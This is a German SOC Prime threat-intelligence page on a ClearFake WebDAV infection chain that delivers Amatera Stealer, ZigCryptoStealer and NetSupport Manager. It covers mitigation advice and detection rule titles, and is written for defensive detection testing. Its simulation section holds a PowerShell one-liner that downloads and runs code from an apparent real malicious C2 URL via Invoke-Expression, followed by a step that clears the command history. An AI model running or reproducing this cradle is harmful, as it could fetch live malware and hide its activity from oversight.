SOC Prime Bias: High

09 Sep 2026 10:12 UTC

ClearFake-WebDAV-Infektionskette liefert Amatera Stealer, ZigCryptoStealer und NetSupport Manager

Author Photo
SOC Prime Team linkedin icon Folgen
ClearFake-WebDAV-Infektionskette liefert Amatera Stealer, ZigCryptoStealer und NetSupport Manager
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine Kampagne, die von ClearFake angetrieben wird, missbraucht WebDAV und Cloudflare Workers, um mehrere Malware-Nutzlasten zu verteilen. Die Hauptnutzlast, Amatera-Stealer, ist darauf ausgelegt, Anmeldedaten und kryptowährungsrelevante Daten zu exfiltrieren. Zusätzliche Nutzlasten umfassen ZigCryptoStealer, der über einen NativeAOT-Loader geliefert wird, und unautorisierte Instanzen von NetSupport Manager, die verwendet werden, um Fernzugriff zu etablieren.

Untersuchung

Cisco Talos untersuchte verdächtige WebDAV-basierte DLL-Ausführung bei einer ukrainischen Regierungsorganisation. Die Analyse deckte zwei getrennte Infektionsketten auf: eine nutzte einen pf.ch Loader, um ZigCryptoStealer und einen auf Go basierenden Reverse Proxy bereitzustellen, und die andere verwendete einen verification.google Loader, um NetSupport Manager zu installieren.

Minderung

Organisationen sollten die Ausführung von WebDAV- und UNC-Pfaden einschränken und auf anomales rundll32.exe Verhalten achten. Robuste EDR-Kontrollen sollten eingesetzt werden, um Techniken wie DLL Hollowing und Module Stomping zu erkennen. Sicherheitsteams sollten auch unautorisierte Nutzung von NetSupport Manager und verdächtige blockchain-bezogene Netzwerkaktivitäten überwachen.

Reaktion

Wenn bösartige Aktivitäten erkannt werden, sollten betroffene Endpunkte sofort isoliert werden, um zusätzliche Datenexfiltration zu verhindern. Ermittler sollten Speicherforensik durchführen, um residente Malware wie Amatera zu identifizieren. Sicherheitsteams sollten auch nach WebDAV-basierter DLL-Ausführung und ungewöhnlichen PowerShell-Aktivitäten in der Umgebung suchen.

Angriffsablauf

Wir aktualisieren diesen Abschnitt noch.

Erkennungen

Verdächtige PowerShell-Strings (via Powershell)

SOC Prime Team
08. Sep 2026

LOLBAS Conhost (via cmdline)

SOC Prime Team
08. Sep 2026

Mögliche PowerShell-Obfuskationsindikatoren (via Powershell)

SOC Prime Team
08. Sep 2026

Möglicher Missbrauch von Telegram als Befehls- und Kontrollkanal (via dns_query)

SOC Prime Team
08. Sep 2026

Verdächtige Befehls- und Kontrollmaßnahmen durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)

SOC Prime Team
08. Sep 2026

IOCs (SourceIP) zur Erkennung: ClearFake-WebDAV-Infektionskette liefert Amatera-Stealer, ZigCryptoStealer und NetSupport Manager

SOC Prime AI Regeln
08. Sep 2026

IOCs (DestinationIP) zur Erkennung: ClearFake-WebDAV-Infektionskette liefert Amatera-Stealer, ZigCryptoStealer und NetSupport Manager

SOC Prime AI Regeln
08. Sep 2026

C2-Kommunikation über WebSocket Secure mit Dubbedmuch für Datenexfiltration [Proxy]

SOC Prime AI Regeln
08. Sep 2026

Erkennung von PowerShell-Skriptdownload und Ausführung von NetSupport Manager [Windows Powershell]

SOC Prime AI Regeln
08. Sep 2026

WebDAV DLL-Ausführung via rundll32.exe [Windows-Prozess-Erstellung]

SOC Prime AI Regeln
08. Sep 2026

Simulation der Ausführung

Voraussetzung: Der Telemetrie- & Basislinien-Pre-Flight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennung erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Gegner simuliert eine „ClearFake“-Infektionskette. Das Ziel ist es, das Fernzugriffs-Tool NetSupport Manager bereitzustellen, um Persistenz und Fernsteuerung zu etablieren. Um signaturbasierte Erkennung von Dateidownloads zu vermeiden, verwendet der Angreifer einen PowerShell-„One-Liner“, der eine JavaScript/PowerShell-Nutzlast von einem entfernten C2-Server (https://kr.cedar2glanz.ru/jewel.js) abruft und direkt im Speicherpuffer mit Invoke-Expressionausführt. Diese Technik hinterlässt einen minimalen Datenträgerabdruck.

  • Regressionstest-Skript:

    # Simulationsskript: ahmt die Ausführung der ClearFake-Infektionskettennutzlast nach
    # WARNUNG: Dieses Skript verwendet die spezifische bösartige URL, die in der Erkennungsregel definiert ist, um einen Alarm auszulösen.
    
    $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js"
    Write-Host "[+] Simulierte bösartige PowerShell-Download und Ausführung..." -ForegroundColor Yellow
    
    # Dieser Befehl imitiert das genaue Muster: URL + IEX/Invoke-Expression
    # Wir verwenden einen Try/Catch-Block, da die URL tatsächlich unerreichbar/tot ist,
    # aber die PROCESS COMMAND LINE wird trotzdem protokolliert.
    try {
        Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl)
    } catch {
        Write-Host "[!] Befehl ausgeführt (Netzwerkfehler erwartet, aber Telemetrie sollte erzeugt werden)." -ForegroundColor Cyan
    }
  • Bereinigungskommandos:

    # Durch diese spezifische Simulation werden keine Dateien erstellt, da es sich um einen In-Memory-Ausführungstest handelt.
    # Dennoch löschen wir den Befehlshistorie, um Spuren aus der lokalen Benutzersitzung zu entfernen.
    Clear-History
    Write-Host "[+] Bereinigung abgeschlossen. Keine Artefakte auf Datenträger." -ForegroundColor Green